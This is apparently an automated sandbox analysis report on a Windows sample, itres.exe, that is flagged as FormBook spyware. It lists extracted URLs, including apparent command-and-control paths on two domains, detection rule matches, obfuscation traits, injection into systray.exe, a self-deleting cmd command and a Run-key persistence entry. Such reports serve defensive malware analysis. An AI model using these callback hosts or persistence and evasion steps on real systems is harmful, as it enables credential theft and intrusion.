00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2 Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2 Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png) Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/logo.png) Source: itres.exe String found in binary or memory: http://ocsp.digicert.com0C Source: itres.exe String found in binary or memory: http://ocsp.digicert.com0O Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://winp112727.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&orderi Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/? Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8 Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers? Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/Anti_Wrinkle_Creams.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1 Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/Cheap_Air_Tickets.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1jo Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/Health_Insurance.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1joK Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/Online_classifieds.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1j Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/Parental_Control.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1joK Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/Top_10_Luxury_Cars.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1j Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/d9s8/?2de=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA939oW Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/display.cfm Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/find_a_tutor.cfm?fp=%2BIsPvnki%2Bc5Lile4ORnau4eJbEr8E2bcfXoDunQ1joKj137 Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/px.js?ch=1 Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/px.js?ch=2 Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: http://www.nittayabeauty.com/sk-logabpstatus.php?a=M0RsYjFCcHhWaHlBWXk1TjYySVZRdC9GazNTNTJEUityOHdJK Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease Source: explorer.exe, 00000002.00000000.204099784.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn Source: systray.exe, 00000004.00000002.443050770.0000000004F9D000.00000004.00000001.sdmp String found in binary or memory: https://www.clicrhonealpes.com/d9s8/?2de=d6pEJxSdPSBH0MIO1uNgncpVh40baHTR/jhPmc3N2xeTp5EUHVGtu5D3Ssn Source: itres.exe String found in binary or memory: https://www.digicert.com/CPS0

### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE

### System Summary:

 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.220821810.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.220868962.0000000000D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.440762612.00000000003A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.183941940.000000000365A000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000004.00000002.441684178.0000000002E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.183747077.00000000035AC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000001.00000002.220483499.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.itres.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 1.2.itres.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_00A504C0 0_2_00A504C0 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_00A536B8 0_2_00A536B8 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_00A5A870 0_2_00A5A870 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_00A53B58 0_2_00A53B58 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_00A57CF0 0_2_00A57CF0 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_00A5CF79 0_2_00A5CF79 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_00A52F50 0_2_00A52F50 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_00A5A85F 0_2_00A5A85F Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00401030 1_2_00401030 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00408A40 1_2_00408A40 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041C2A7 1_2_0041C2A7 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041ABE3 1_2_0041ABE3 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041ABE6 1_2_0041ABE6 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041B464 1_2_0041B464 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041BCC5 1_2_0041BCC5 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00402D89 1_2_00402D89 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00402D90 1_2_00402D90 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041B619 1_2_0041B619 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00402FB0 1_2_00402FB0 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0473B477 4_2_0473B477 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047DD466 4_2_047DD466 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0472841F 4_2_0472841F Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047D4496 4_2_047D4496 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047E1D55 4_2_047E1D55 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04710D20 4_2_04710D20 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047E2D07 4_2_047E2D07 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0472D5E0 4_2_0472D5E0 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047E25DD 4_2_047E25DD Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04742581 4_2_04742581 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047D2D82 4_2_047D2D82 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04736E30 4_2_04736E30 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047DD616 4_2_047DD616 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04735600 4_2_04735600 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047E2EF7 4_2_047E2EF7 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047C1EB6 4_2_047C1EB6 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047E1FF1 4_2_047E1FF1 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047EDFCE 4_2_047EDFCE Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0473A830 4_2_0473A830 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047EE824 4_2_047EE824 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047D1002 4_2_047D1002 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047E28EC 4_2_047E28EC Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047420A0 4_2_047420A0 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047E20A8 4_2_047E20A8 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0472B090 4_2_0472B090 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_04734120 4_2_04734120 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0471F900 4_2_0471F900 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047399BF 4_2_047399BF Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0473B236 4_2_0473B236 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047CFA2B 4_2_047CFA2B Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047D4AEF 4_2_047D4AEF Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047E22AE 4_2_047E22AE Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0473AB40 4_2_0473AB40 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047BCB4F 4_2_047BCB4F Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047E2B28 4_2_047E2B28 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0473A309 4_2_0473A309 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047C23E3 4_2_047C23E3 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047D03DA 4_2_047D03DA Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0474ABD8 4_2_0474ABD8 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_047DDBD2 4_2_047DDBD2 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0474EBB0 4_2_0474EBB0 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0473EB9A 4_2_0473EB9A Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0474138B 4_2_0474138B Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8C2A7 4_2_02E8C2A7 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E78A40 4_2_02E78A40 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8ABE3 4_2_02E8ABE3 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8ABE6 4_2_02E8ABE6 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8B619 4_2_02E8B619 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E72FB0 4_2_02E72FB0 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8BCC5 4_2_02E8BCC5 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8B464 4_2_02E8B464 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E72D89 4_2_02E72D89 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E72D90 4_2_02E72D90
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\systray.exe Code function: String function: 0471B150 appears 145 times
 PE / OLE file has an invalid certificate Show sources
 Source: itres.exe Static PE information: invalid certificate
 PE file contains strange resources Show sources
 Source: itres.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
 Source: itres.exe Binary or memory string: OriginalFilename vs itres.exe Source: itres.exe, 00000000.00000002.183528208.00000000034AD000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAlienRunPE.dll6 vs itres.exe Source: itres.exe Binary or memory string: OriginalFilename vs itres.exe Source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs itres.exe Source: itres.exe, 00000001.00000002.220957412.0000000000E16000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamesystray.exej% vs itres.exe Source: itres.exe Binary or memory string: OriginalFilenameGoogle Chrome.exe< vs itres.exe
 Yara signature match Show sources
 PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3) Show sources
 Source: itres.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@14/9
 Creates files inside the user directory Show sources
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_01
 PE file has an executable .text section and no other executable section Show sources
 Source: itres.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using the .NET runtime (Probably coded in C#) Show sources
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: itres.exe Virustotal: Detection: 56% Source: itres.exe ReversingLabs: Detection: 58%
 Spawns processes Show sources
 Source: unknown Process created: C:\Users\user\Desktop\itres.exe 'C:\Users\user\Desktop\itres.exe' Source: unknown Process created: C:\Users\user\Desktop\itres.exe C:\Users\user\Desktop\itres.exe Source: unknown Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\itres.exe' Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Source: C:\Users\user\Desktop\itres.exe Process created: C:\Users\user\Desktop\itres.exe C:\Users\user\Desktop\itres.exe Jump to behavior Source: C:\Windows\SysWOW64\systray.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\itres.exe' Jump to behavior
 Uses an in-process (OLE) Automation server Show sources
 Checks if Microsoft Office is installed Show sources
 PE file contains a COM descriptor data directory Show sources
 Source: itres.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
 Contains modern PE file flags such as dynamic base (ASLR) or NX Show sources
 Source: itres.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
 Binary contains paths to debug symbols Show sources
 Source: Binary string: systray.pdb source: itres.exe, 00000001.00000002.220939136.0000000000E0A000.00000004.00000020.sdmp Source: Binary string: systray.pdbGCTL source: itres.exe, 00000001.00000002.220939136.0000000000E0A000.00000004.00000020.sdmp Source: Binary string: wntdll.pdbUGP source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp, systray.exe, 00000004.00000002.442081918.00000000046F0000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: itres.exe, 00000001.00000002.221181533.000000000135F000.00000040.00000001.sdmp, systray.exe

### Data Obfuscation:

 Binary contains a suspicious time stamp Show sources
 Source: initial sample Static PE information: 0xCD22C4C3 [Sun Jan 22 10:11:15 2079 UTC]
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Users\user\Desktop\itres.exe Code function: 0_2_000D02A1 push es; retf 0_2_000D02F0 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_004148E6 push es; retf 1_2_004148ED Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00414977 push esi; ret 1_2_00414978 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_004149C5 pushfd ; iretd 1_2_004149C6 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041AB42 push eax; ret 1_2_0041AB48 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2 Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00417C73 push cs; retf 1_2_00417C7E Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B Source: C:\Users\user\Desktop\itres.exe Code function: 1_2_007802A1 push es; retf 1_2_007802F0 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_0476D0D1 push ecx; ret 4_2_0476D0E4 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8AAF5 push eax; ret 4_2_02E8AB48 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8ABAC push eax; ret 4_2_02E8ABB2 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8AB4B push eax; ret 4_2_02E8ABB2 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E8AB42 push eax; ret 4_2_02E8AB48 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E848E6 push es; retf 4_2_02E848ED Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E849C5 pushfd ; iretd 4_2_02E849C6 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E84977 push esi; ret 4_2_02E84978 Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E84E46 push 76AC60C6h; retf 4_2_02E84E4B Source: C:\Windows\SysWOW64\systray.exe Code function: 4_2_02E87C73 push cs; retf 4_2_02E87C7E
 Binary may include packed or encrypted code Show sources
 Source: initial sample Static PE information: section name: .text entropy: 7.9315085015

### Boot Survival:

 Creates an undocumented autostart registry key Show sources
 Source: C:\Windows\SysWOW64\systray.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run YFIPILCX9DA Jump to behavior
 Disables application error messsages (SetErrorMode) Show sources